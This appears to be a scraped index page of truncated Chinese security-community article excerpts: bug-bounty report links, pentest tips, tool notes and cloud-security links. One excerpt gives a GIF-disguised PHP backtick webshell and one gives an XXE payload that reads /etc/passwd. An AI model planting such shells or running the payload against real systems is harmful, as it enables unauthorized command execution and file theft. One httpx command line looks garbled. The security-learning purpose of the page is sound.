漏洞报告 【MTN Group】表单重复提交 http://hackerone.com/reports/1165223 【MTN Group】XSS漏洞 http://hackerone.com/reports/1091165 【Mail.ru】通过类创建对话框导致存储型XSS http://ha...

很多工具都带有自己的特征，像sqlmap、awvs等扫描器，一旦开扫就很容易被waf ban掉。内网的设备也捕获了一些工具的流量特征，像CobaltStrike本来是钓鱼的，结果因为没有隐匿自身特征反被上线。 ...

http://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools 文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

前言 由于小程序的便捷性，越来越多的应用迁移到了了小程序上，由此伴随着小程序上线前的日常渗透测试工作也开始增加。但小程序的测试中经常会遇到数据包被加密了，导致无法进行改包测试。和测...

知己知彼，百战不殆 1、如果提示缺少参数，如{msg：params error}，可尝使用字典模糊测试构造参数，进一步攻击。 2、程序溢出，int最大值为2147483647，可尝试使用该值进行整数溢出，观察现象。...

漏洞报告 Azure 【4万刀】微软云某agent未授权RCE漏洞 http://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution LINE LINE IOS应用 地址栏嗅探漏洞 http:...

漏洞报告 【Reddit】用户名密码暴力破解 http://hackerone.com/reports/1165225 【Reddit】密码重置没有速率限制会导致电子邮件枚举 http://hackerone.com/reports/1425884 【Proctorio】通用跨...

漏洞报告 【 Lark Technologies】[IDOR] 通过reminderId参数修改其他团队的提醒 http://hackerone.com/reports/946323 【Adobe】在配置文件中泄露 github 访问令牌 http://hackerone.com/report...

0x01正文 打开网站 先用7kb扫一波目录 哦吼，发现了一堆的目录遍历(绿色的都是)。 这里一个 Log目录十分的显眼，很有可能造成log泄露 okey，如我所料。收获了一个通用中危洞√ 27450-kwvsjna88f...

云风险百科，搜索 900 多个云安全风险 http://orca.security/resources/cloud-risk-encyclopedia/ Microsoft Security 提供新的多云功能 http://www.microsoft.com/security/blog/2022/02/23/mi...

无敏感函数的php一句话(php中可用`来执行系统命令，相当于system、eval等函数)，执行命令:shell.php?1=whoami Gif89a <?php $a = `$_GET[1]`; echo $a; ?> 文字来源于- 火线 Zone-云安全...

有回显，用以下poc直接读取/etc/passwd： <?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&am...

http://github.com/ggg4566/SQLEXP SQL 注入利用工具，存在waf的情况下自定义编写tamper脚本 dump数据. 对于SQL注入漏洞利用通常情况下我们使用SQLMAP，在waf存在的场景下想利用自己独有的paylo...

信息收集之快速提取SSL证书里的域名 echo '唯品会（原Vipshop.com）特卖会：品牌特卖_确保正品_确保低价_货到付款' | httpx -tls-probe -json -silent | jq .tls.dns_names #安全小天地Zone Tip...

web漏洞挖掘指南 前端跨域漏洞 一、何为跨域 1.设想一种场景，一个恶意网站上嵌入了一个iframe标签去加载银行的登陆页面，高度和宽度的设置和真实的银行官网一样，当用户访问恶意网站并登录时，...

#原创文章# 前言 上次听了火器的线上分享会议有提到火器的资产关联大概的思路，真的是收获了很多。再夸夸火器，在挖一些项目中的确能省掉很多资产收集的时间。本文主要参考上次会议中提交的一些...